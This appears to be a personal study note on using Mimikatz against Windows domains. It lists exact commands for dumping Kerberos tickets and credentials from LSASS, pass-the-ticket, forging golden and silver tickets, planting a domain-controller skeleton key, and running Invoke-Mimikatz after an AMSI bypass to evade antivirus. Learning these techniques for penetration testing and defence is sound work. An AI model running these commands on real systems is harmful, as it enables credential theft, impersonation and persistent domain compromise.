- author:: Nathan Acks
- date:: 2022-08-31
Mimikatz needs to be run with administrative privileges (on the local machine), and provides its own command prompt. Use the
privilege::debug command to check if you’re running with the right privileges.
Mimikatz can dump ticket granting tickets (and session keys) from the memory of Windows’ Local Security Authority Subsystem Service (LSASS); these can then be used to for privilege elevation or lateral movement (depending on which users are active on that machine).
sekurlsa::tickets /export command to dump any Kerberos “tickets” (really ticket + session key data structures) from LSASS’s memory as .kirbi files. Tickets are named like ID-USER-SERVICE-DOMAIN.kirbi; ticket granting tickets have a
krbtgt SERVICE name. If you can find a
krbtgt ticket belonging to an administrator account, then you’ve (almost) struck gold.
Pass the Ticket Attacks
kerberos::ptt TICKET_FILE command to load the data structure in the specified .kirbi file into memory (allowing the account you’re logged in as to “pass the ticket” and impersonate the user whose ticket you’ve harvested).
Golden/Silver Ticket Attacks
To generate a gold or silver ticket using Mimikatz, begin by running the
lsadump::lsa /inject /name:SERVICE command to retrieve the service SID and NTLM password hash for that service. If SERVICE is
krbtgt then this will allow the creation of a golden ticket, otherwise you’ll be creating a silver ticket.
(You can also use a user name instead of SERVICE, in which case it appears that Mimikatz will just request a ticket granting ticket from the KDC as that user in the next step; this is theoretically just as noisy as a golden ticket, but looks more “normal”.)
To actually create and cache the ticket, use
Kerberos::golden /user:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /id:TYPE, where:
USERis the user to create the ticket for (probably the one you’ve compromised).
DOMAINis the domain to create the ticket for.
SIDis the SID of the service from the previous step.
HASHis the NT hash of the service password from the previous step.
TYPEis the type of Kerberos ticket to create; use 500 for a golden (ticket granting) ticket, and 1103 for a service ticket.
Once the ticket has been created, use
misc::cmd to open a command prompt using the newly forged ticket.
KDC Skeleton Key
If Mimikatz is run on a domain controller, it can modify the authentication service’s memory using the
misc::skeleton command to cause it to attempt to decrypt the AS-REQ using both the user’s NT hash and an NT hash of your choosing (by default
60BA4FCADC466C7A033C178194C03DF6, which is just
mimikatz). This means that you can send an AS-REQ as any user using the “skeleton key” hash to gain access as that user, similar to a golden ticket attack.
Obviously this isn’t very persistent itself, as the skeleton key will be lost if the server is rebooted or the authentication service restarted.
Pure PowerShell Implementation
Mimikatz binaries are generally detected by AV on download these days, but fortunately there’s a PowerShell reimplementation available from the Empire Project that can be run after bypassing AMSI.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' > C:\mkat.txt
Note that Microsoft Defender will still detect the execution of Invoke-Mimikatz and kill the hosting PowerShell process. This is why we need to redirect the output to a file.